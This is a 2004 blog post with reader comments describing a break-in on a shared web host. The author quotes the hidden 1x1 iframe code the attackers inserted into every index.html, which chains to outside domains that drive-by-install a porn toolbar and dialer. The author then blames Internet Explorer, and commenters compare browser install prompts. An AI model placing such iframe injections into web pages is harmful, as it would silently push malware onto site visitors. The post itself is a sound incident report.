Internet Explorer is the problem
Today, someone broke into the server on which my Norwegian weblog is hosted. All due to what my host admitted to being a stupid human error — they booted the machine on which the site resides with the wrong kernel (a vulnerable 2.4.18 kernel) and opened themselves up for a root exploit.
I blame Internet Explorer for this problem.
No. You didn’t miss anything: I blame Microsoft Internet Explorer for this problem.
Once more, with feeling: Internet Explorer is the problem.
You see, this particular breakin wasn’t done by the average scriptkiddie with a need to deface web sites with his “0wn3d” tag. The breakin was done by someone with an economic motive for breaking in.
On every index.html document on the server (and this being shared hosting, there were quite a few of these), the following code was inserted right after <body>:
<IFRAME
SRC="http://www.forced-action.com/?d=get"
WIDTH="1" HEIGHT="1"></IFRAME>A friend of mine discovered this, because her computer crashed every time she went to my site, after some porn program had tried to install itself on her computer. If we look at the document referenced in the iframe, it contains:
<IFRAME
SRC="http://mikefox.ud-dial.biz/connect.cgi" WIDTH=0 BORDER=0
HEIGHT=0></IFRAME>
<iframe src="tool.html" width=1 height=1></iframe>
<IFRAME
SRC="http://ttvqt.selfbookmark.info/enter.cgi?id=1929" WIDTH=1
HEIGHT=1></IFRAME>The middle document, tool.html is the culprit here, as it points to http://install.xxxtoolbar.com/ist/scripts/prompt.php - a Javascript that attempts to do a drive-by-install of a porn toolbar ActiveX control. The spyware in this case is known as ISTbar.Slotch. According to the info on Spybot Search & Destroy it Tries to install the FCI dialer on nearly every window <it opens.
So, as you see, the people who attempted the breakin on my hosts server had a clear economic incentive to break in and silently altering web pages. And they do know how to hide their tracks. The domains pointed to reside in Latvia, Panama, Russia and Canada, and I wouldn’t be too surprised if the whois information is as fake as a blow-up doll.
So, I blame Microsoft Internet Explorer for this problem: If Internet Explorer hadn’t made users such an easy target for scams, these scumbags wouldn’t have had the same incentive to break in and mass-alter web pages
If this collection of organized criminals were unable to use a browser to hijack someone’s phone line and monitor their habits, the sites involved would never have been a target.
My Norwegian blog is entirely non-commercial, and I discovered the problem within a few hours, so I didn’t loose any money over this, just time and temprament. But, for a small-time Internet business, this could have been a lot worse. Being tainted with having “installed porn” on a users machine might drive customers away on a permanent basis and ruin your reputation.
And I repeat: None of this would have happened if Internet Explorer had been a safe, sandboxed browser to begin with. A web browser has no business whatsoever installing software. None, never!
Comments
Comment from Jesse Ruderman on 2004-02-22 04:04
All three major Windows browsers allow a web page to install software with one click from the user:
IE: ActiveX
Firefox: XPI
Opera 7.23: Downloading a .exe file
Button names: Firefox has Install Now/Cancel, which is clear. Internet Explorer has Yes/No, which is common on Windows and too vague for a security dialog. Opera has Open/Save, which is downright deceptive — “Opening” something should never cause untrusted software to run on your computer unsandboxed.
Default button: Only Firefox gets this wrong and makes “Install Now” the default button.
Warning: Firefox’s warning is clear and in bold. Internet Explorer’s is vague and buried. Opera has no warning.
Distractions: Internet Explorer’s dialog makes a big deal of the fact that the code is signed, making it seem safer than it is and making it less likely that a user will see the warning.
I don’t think this is a good thing, but IMO you’re wrong in attacking Internet Explorer when other browsers are comparable.
Comment from Arve on 2004-02-22 04:08
Ok, let me clarify: The problem is drive-by-downloads.
Comment from Lasse on 2004-02-23 08:17
Well, if you ask me, the problem is rather users who doesn’t update their systems. I tested the link in mention on an un-trusted machine with fresh updated OS (Win XP Home ed.) and IE, and nothing was installed.
Internet Explorer might be a very poorly made program - but all systems will have faults and flaws, and the user is responsible for keeping his or her system updated.
Comment from Asbjørn Ulsberg on 2004-02-23 11:34
I agree that Internet Explorer is a problem, but I won’t give it all the blame. The biggest problem is users. Users who don’t update their systems. This is, however, just a result of Microsoft’s poor security policy. With systems older than Windows 2000, it’s afaik impossible to get automatic updates. And in 2000, the automatic update isn’t installed out of the box.
Microsoft has made all their software too difficult to update, and much too easy to attack. They have had every pipe open by default, and are trying to close them one by one now. Needless to say; it’s too late.
If a good security policy with automatic updates were enforced from day one, you wouldn’t see these kinds of problems. People would get the updates without any fuzz, and the pipes wouldn’t be open by default.
So, when push comes to shove, the problem isn’t Internet Explorer or the users of the browser, but Microsoft itself. If the company did everything right, there would still be problems, but they would be itsy bitsy compared to those we see today.
Comment from steven hopper on 2006-01-13 06:14
Right on track. Now how about something on anti-spyware comapnies who spoof trial users into buying their product? Including freeware ones who seem to devise ways to motivate users into making ‘donations’?
Comment from Arve on 2006-01-13 10:12
Steven, there is a permanent solution for that.
This discussion has been closed. No further comments may be added.